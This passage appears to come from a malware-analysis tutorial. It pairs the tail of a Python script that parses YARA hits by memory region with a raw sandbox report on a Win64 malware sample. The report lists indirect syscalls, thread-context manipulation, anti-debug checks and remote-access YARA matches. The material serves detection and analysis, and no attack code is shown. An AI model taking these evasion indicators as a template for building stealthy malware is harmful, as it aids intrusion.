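                     "region": decode_source(m["src"])})
    return hits


def normalise_rule_names(hits: list[dict]) -> list[dict]:
    """Short-form lines name a rule by its description; map those onto the rule
    id wherever a long-form line supplies that description."""
    by_desc = {h["meta"]["description"]: h["rule"] for h in hits if "description" in h["meta"]}
    for h in hits:
        h["rule"] = by_desc.get(h["rule"], h["rule"])
    return hits


def region_label(r: dict) -> str:
    if r["kind"] == "process":
        return f"process strings (PID {r['pid']})"
    if r["kind"] == "unpack":
        return f"carved PE @ {r['base']:#x} (snapshot {r['snapshot']})"
    return f"{r['region_type']} @ {r['base']:#x} {r['protect']} (snapshot {r['snapshot']})"


def rules_by_region(hits: list[dict]) -> dict:
    grouped = defaultdict(set)
    for h in hits:
        grouped[h["rule"]].add(region_label(h["region"]))
    return {rule: sorted(regions) for rule, regions in grouped.items()}


def executable_private_regions(hits: list[dict]) -> list[int]:
    """Executable, privately allocated regions with a hit: the first places to
    carve a beacon from when extracting its configuration."""
    return sorted({h["region"]["base"] for h in hits
                   if h["region"]["kind"] == "sdmp" and h["region"]["executable"]
                   and h["region"]["region_type"] == "MEM_PRIVATE"})


if __name__ == "__main__":
    hits = normalise_rule_names(parse_hits(SAMPLE))
    for rule, regions in rules_by_region(hits).items():
        print(rule, *regions, sep="\n    ")
    print("carve from:", [f"{b:#x}" for b in executable_private_regions(hits)])
```

The protection and region-type fields are what make a hit actionable: a string rule firing in a PAGE_READWRITE private region points at beacon data (configuration, strings), while a code rule firing in a PAGE_EXECUTE_READ private region points at the loaded beacon body itself.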
Source: classification engine Classification label: mal92.troj.evad.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140054158 GetVersionExW,wcschr,CoInitializeEx,CoCreateInstance, 0_2_0000000140054158
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014005876C GetModuleHandleW,GetUserDefaultUILanguage,FindResourceExW,FindResourceW,LoadResource,GlobalAlloc, 0_2_000000014005876C
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Static file information: File size 3636736 > 1048576
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x211c00
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Static PE information: More than 200 imports for USER32.dll
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Jenkins\workspace\consumer-12-0-1-service\bin\Release\x64\SBAMCommandLineScanner.pdb source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Static PE information: real checksum: 0x33725e should be: 0x3790fb
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001401350C1 push rcx; ret 0_2_00000001401350C2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140104C7C SetForegroundWindow,IsIconic,PostMessageW,IsIconic, 0_2_0000000140104C7C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140044F34 IsIconic, 0_2_0000000140044F34
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014013D3C0 IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics, 0_2_000000014013D3C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400B1740 GetParent,IsIconic,GetParent,GetDlgCtrlID, 0_2_00000001400B1740
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140105A3C IsIconic, 0_2_0000000140105A3C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_0000000140099CE8 SetRectEmpty,RedrawWindow,ReleaseCapture,SetCapture,ReleaseCapture,SetCapture,GetParent,SendMessageW,UpdateWindow,GetParent,SendMessageW,IsWindow,IsIconic,IsZoomed,IsWindow,UpdateWindow, 0_2_0000000140099CE8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001400C5D9C IsWindowVisible,IsIconic, 0_2_00000001400C5D9C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014013DFAC IsWindowVisible,IsWindowVisible,GetWindowRect,IsIconic,CopyRect,MonitorFromPoint,GetMonitorInfoW,CopyRect,CopyRect,SystemParametersInfoW,OffsetRect,GetSystemMetrics,GetSystemMetrics, 0_2_000000014013DFAC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014013E2CC IsIconic,PostMessageW, 0_2_000000014013E2CC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001401CDB40 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00000001401CDB40
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe API coverage: 1.5 %
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014003C388 GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose, 0_2_000000014003C388
Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2364213906.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3314909007.0000000000459000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2275023579.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2395775873.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2498019988.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2121493380.00000000004DC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2438416359.00000000004DB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_3_01FC4060 LdrLoadDll, 0_3_01FC4060
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001401D83C4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00000001401D83C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001401CC9B0 GetLastError,IsDebuggerPresent,OutputDebugStringW, 0_2_00000001401CC9B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_000000014000E540 GetProcessHeap,_Init_thread_footer,_Init_thread_footer, 0_2_000000014000E540
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe NtResumeThread: Indirect: 0x20A4F90
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe NtSetContextThread: Indirect: 0x20A3ACA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe NtAllocateVirtualMemory: Indirect: 0x1FC0185
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe NtCreateThreadEx: Indirect: 0x20A6602
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe NtSetContextThread: Indirect: 0x20A6953
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe NtResumeThread: Indirect: 0x20A66ED
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe NtSuspendThread: Indirect: 0x20A4E8C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe NtSetContextThread: Indirect: 0x20A3D44
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe NtSetContextThread: Indirect: 0x20A66D8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe NtCreateThreadEx: Indirect: 0x20A686D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe NtAllocateVirtualMemory: Indirect: 0x1FC0249
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe NtProtectVirtualMemory: Indirect: 0x1FC0887
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Thread register set: 6516 40
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001402009C0 AllocateAndInitializeSid,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,MakeSelfRelativeSD,GetLastError,LocalAlloc,MakeSelfRelativeSD,LocalFree,LocalFree,FreeSid, 0_2_00000001402009C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: try_get_function,GetLocaleInfoW, 0_2_00000001401EFFE4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Code function: 0_2_00000001401F0068 try_get_function,GetSystemTimeAsFileTime, 0_2_00000001401F0068
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Remote Access Functionality

Source: Yara match File source: 0.3.SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe.2050000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe PID: 6516, type: MEMORYSTR